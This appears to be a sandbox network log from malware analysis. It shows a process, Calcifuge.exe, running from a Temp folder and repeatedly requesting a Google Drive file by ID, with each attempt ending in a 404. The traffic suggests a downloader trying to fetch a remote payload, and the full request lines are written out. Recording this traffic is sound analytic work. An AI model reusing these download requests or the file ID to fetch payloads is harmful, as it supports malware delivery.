                                                                                              Date: Sat, 11 Jan 2025 02:53:19 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-69DEQxRekV8Eo3r2bUpjQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:19 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="34c-OK65f_4zV9pYwjfRlA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              44 | 192.168.2.4 | 53716 | 172.217.16.206 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:20 UTC | 428 | OUT | GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:20 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:20 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-_Ts2gH6hkDU6r5ph0ajppA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                              45 | 192.168.2.4 | 53722 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              2025-01-11 02:53:21 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:22 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgTc4uaSEo6QrpOmhQaovRKT5zDTB1rCcoJgk9fDy9eix_F9c93ignVFYTmB9YuzdfN3qeB23Gg
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:21 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-oMJ3axvNQWE2b_gheugbgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:22 UTC  1652  IN
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rS9-nvxRWVVGDFmJRywZ1Q">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                              46  192.168.2.4  53727  172.217.16.206  443  7824  C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                              2025-01-11 02:53:22 UTC  428  OUT  GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:23 UTC  1920  IN  HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:23 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'nonce-CxTVVzreRTodpIouaU5o0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                              47  192.168.2.4  53733  172.217.16.129  443  7824  C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                              2025-01-11 02:53:23 UTC  470  OUT  GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:24 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgQ2VlrdF3xxGmaoJEXdrFEG-jAqB5m1o-GUEI_agm4ifUP2I_638LVMe9LB5W6pvx40luMwxak
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:24 GMT
                                                                                              Content-Security-Policy: script-src 'nonce-VKpycSgaapTKQWwjzxq95g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:24 UTC  1652  IN
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rGbapr_-oD1SiAsi_nKe2w">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                              48  192.168.2.4  53740  172.217.16.206  443  7824  C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                              2025-01-11 02:53:25 UTC  428  OUT  GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:25 UTC  1920  IN  HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:25 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'nonce-8eYJ5Em_3DylzG3jA1AvPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                              49  192.168.2.4  53749  172.217.16.129  443  7824  C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                              2025-01-11 02:53:26 UTC  470  OUT  GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:26 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgSa8xXcBMP2cImUQNK7_X4ldih_6pHcgu-V9km2ltnFqcFcyEG5F8nKPHEP88vGSc48GZN5K10
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:26 GMT
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-1oS_KEGaPphbIX4rFVe1eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-11 02:53:26 UTC  1652  IN
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0XSxIaqY8fKnwwMljV204A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                              Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                                                              50  192.168.2.4  53757  172.217.16.206  443  7824  C:\Users\user\AppData\Local\Temp\Calcifuge.exe
                                                                                              Timestamp  Bytes transferred  Direction  Data
                                                                                              2025-01-11 02:53:27 UTC  428  OUT  GET /uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Host: drive.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
                                                                                              2025-01-11 02:53:27 UTC  1920  IN  HTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:27 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-8K-onY4E1RkAorApmnDxNw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.4 | 53763 | 172.217.16.129 | 443 | 7824 | C:\Users\user\AppData\Local\Temp\Calcifuge.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-11 02:53:28 UTC | 470 | OUT | GET /download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download HTTP/1.1
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=gEFkAX9xLNqylUlEIDqIwRnXUlNd_KEn4OYgdA5ekkJab1L84if5xMJbATHi6YOreCN2h_XVeABbWtP4VO744B_eESzVhWdoRsCepBj_0FI2Xpw81brPO8IrMD2TxcFH4a3gfXzRghKi7UGUzLJDO1yCmOoC43M9-lRohsfnaLl8K9qAjAE5rTAJlI9Yi5raAA
2025-01-11 02:53:28 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFIdbgS8cQ0kWj-oudw8qbCzmOa1EJoW5KumnoCikkFPmbhR4Ngi5_c197TvS68Lkayg37REULMgrz8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Sat, 11 Jan 2025 02:53:28 GMT
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'nonce-dL7VXpJCvqk05agcTG3-1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                              Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
